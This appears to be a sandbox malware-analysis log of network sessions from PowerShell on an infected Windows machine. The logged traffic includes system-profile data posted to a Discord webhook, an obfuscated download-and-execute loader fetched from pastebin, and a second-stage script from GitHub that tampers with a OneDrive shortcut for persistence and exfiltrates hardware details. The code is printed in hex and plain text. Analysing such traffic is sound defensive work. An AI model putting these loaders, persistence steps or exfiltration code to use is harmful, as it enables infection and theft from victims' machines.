                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                x-ratelimit-limit: 5
                                                                x-ratelimit-remaining: 4
                                                                x-ratelimit-reset: 1729000830
                                                                x-ratelimit-reset-after: 1
                                                                via: 1.1 google
                                                                alt-svc: h3=":443"; ma=86400
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKHpiolfSBMOmhMVHMCKAAGkZ4L%2F6xtf%2FVEDsRBGlsW1e3%2Bnbj6rsjP5fip6jl%2BVRZLSXNeuydXw5a5zIi2A%2Fm4kMuUdiHesM2Z0v802QXta%2BC2YBtzrGoGQ7tKZ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Content-Type-Options: nosniff
                                                                Set-Cookie: __cfruid=48444a3424e72dbda7b42e0414b3a7ec1da5158a-1729000828; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                Set-Cookie: _cfuvid=.tK.8_bM.IlqYQCskpMyBWYMJqLfcyu08rolf4Vi0ak-1729000828721-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Server: cloudflare
                                                                CF-RAY: 8d3055eabfe8463e-DFW
                                                                2024-10-15 14:00:28 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.752049162.159.128.2334436448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:28 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Content-Type: application/json
                                                                Host: discord.com
                                                                Content-Length: 302
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:28 UTC302OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 47 31 31 41 50 36 36 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41
                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** AG11AP66\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
                                                                2024-10-15 14:00:28 UTC1261INHTTP/1.1 404 Not Found
                                                                Date: Tue, 15 Oct 2024 14:00:28 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 45
                                                                Connection: close
                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                x-ratelimit-limit: 5
                                                                x-ratelimit-remaining: 3
                                                                x-ratelimit-reset: 1729000830
                                                                x-ratelimit-reset-after: 1
                                                                via: 1.1 google
                                                                alt-svc: h3=":443"; ma=86400
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eWkylGAmxKzDKJkj%2B7wLOdgBOts%2FMJuy3G3m0RU5XfXU4S9YAVZewPD4icofBcQK3HU9Py%2BRuuGsRw71Z5d%2F1Giz%2B1y4cNwI13zAbbcx4Svg84Tzzoax%2FDCGxOc3"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Content-Type-Options: nosniff
                                                                Set-Cookie: __cfruid=48444a3424e72dbda7b42e0414b3a7ec1da5158a-1729000828; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                Set-Cookie: _cfuvid=xSJuK64XEUQZUWANV0z1KgUnC_eADyp7hPkdEdtJkUU-1729000828724-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Server: cloudflare
                                                                CF-RAY: 8d3055ead8443ad3-DFW
                                                                2024-10-15 14:00:28 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.752102162.159.128.2334437172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:38 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Content-Type: application/json
                                                                Host: discord.com
                                                                Content-Length: 302
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:38 UTC302OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 47 31 31 41 50 36 36 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41
                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** AG11AP66\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
                                                                2024-10-15 14:00:38 UTC1261INHTTP/1.1 404 Not Found
                                                                Date: Tue, 15 Oct 2024 14:00:38 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 45
                                                                Connection: close
                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                x-ratelimit-limit: 5
                                                                x-ratelimit-remaining: 4
                                                                x-ratelimit-reset: 1729000840
                                                                x-ratelimit-reset-after: 1
                                                                via: 1.1 google
                                                                alt-svc: h3=":443"; ma=86400
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cub%2FLRgLACco1CFNH9Q9AmckyywIt1%2BhfywRakNHRkEM%2Fk0UUVj7%2FB2NAytGN8ysw45uQ2cj0fepkrPy2yqV6AH0tjs9XplDLW62cRmyc3%2B5gvEA87fU%2FqhQFlEK"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Content-Type-Options: nosniff
                                                                Set-Cookie: __cfruid=91e6537d835960c5dea5f6c908574570d8411595-1729000838; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                Set-Cookie: _cfuvid=XRs7R23fkRnrXQRBTIVDR3Mx4Pp6hStSK7yD5KtZGmE-1729000838909-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Server: cloudflare
                                                                CF-RAY: 8d30562a7e982e66-DFW
                                                                2024-10-15 14:00:38 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.752104162.159.128.2334437180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:38 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Content-Type: application/json
                                                                Host: discord.com
                                                                Content-Length: 302
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:38 UTC302OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 47 31 31 41 50 36 36 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41
                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** AG11AP66\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
                                                                2024-10-15 14:00:39 UTC1253INHTTP/1.1 404 Not Found
                                                                Date: Tue, 15 Oct 2024 14:00:38 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 45
                                                                Connection: close
                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                x-ratelimit-limit: 5
                                                                x-ratelimit-remaining: 3
                                                                x-ratelimit-reset: 1729000840
                                                                x-ratelimit-reset-after: 1
                                                                via: 1.1 google
                                                                alt-svc: h3=":443"; ma=86400
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqdOiyxqP9WV6kqIVh%2B5GCuOIqE00aCHn6eB40YB1BB9geKJipNhOdqwNJ2v6snbPVw1QCRaxAyACQI3aiUlPKUb5FN82%2FE91IyQ0mMwPxd4u4YjfM9OBY4SVQRZ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Content-Type-Options: nosniff
                                                                Set-Cookie: __cfruid=91e6537d835960c5dea5f6c908574570d8411595-1729000838; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                Set-Cookie: _cfuvid=yEOotwkWt1dVal8F_cF0I.SDW0zDBw1WL7y6Ggktvek-1729000838959-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Server: cloudflare
                                                                CF-RAY: 8d30562adb78e76a-DFW
                                                                2024-10-15 14:00:39 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.752114104.20.3.2354435844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:40 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: pastebin.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:41 UTC397INHTTP/1.1 200 OK
                                                                Date: Tue, 15 Oct 2024 14:00:41 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-frame-options: DENY
                                                                x-content-type-options: nosniff
                                                                x-xss-protection: 1;mode=block
                                                                cache-control: public, max-age=1801
                                                                CF-Cache-Status: HIT
                                                                Age: 491
                                                                Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8d305638ae10ddb0-DFW
                                                                2024-10-15 14:00:41 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                2024-10-15 14:00:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.752125185.199.109.1334435844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:42 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:42 UTC901INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 7508
                                                                Cache-Control: max-age=300
                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                Content-Type: text/plain; charset=utf-8
                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: deny
                                                                X-XSS-Protection: 1; mode=block
                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:42 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdal2120101-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 1
                                                                X-Timer: S1729000842.475392,VS0,VE1
                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                X-Fastly-Request-ID: b938ed4570071f8a2456399d468e69a4a3ce2f92
                                                                Expires: Tue, 15 Oct 2024 14:05:42 GMT
                                                                Source-Age: 48
                                                                2024-10-15 14:00:42 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                2024-10-15 14:00:42 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                2024-10-15 14:00:42 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                2024-10-15 14:00:42 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                2024-10-15 14:00:42 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                2024-10-15 14:00:42 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.752155104.20.3.2354434240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:48 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: pastebin.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:48 UTC397INHTTP/1.1 200 OK
                                                                Date: Tue, 15 Oct 2024 14:00:48 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-frame-options: DENY
                                                                x-content-type-options: nosniff
                                                                x-xss-protection: 1;mode=block
                                                                cache-control: public, max-age=1801
                                                                CF-Cache-Status: HIT
                                                                Age: 498
                                                                Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8d3056677bc8e81f-DFW
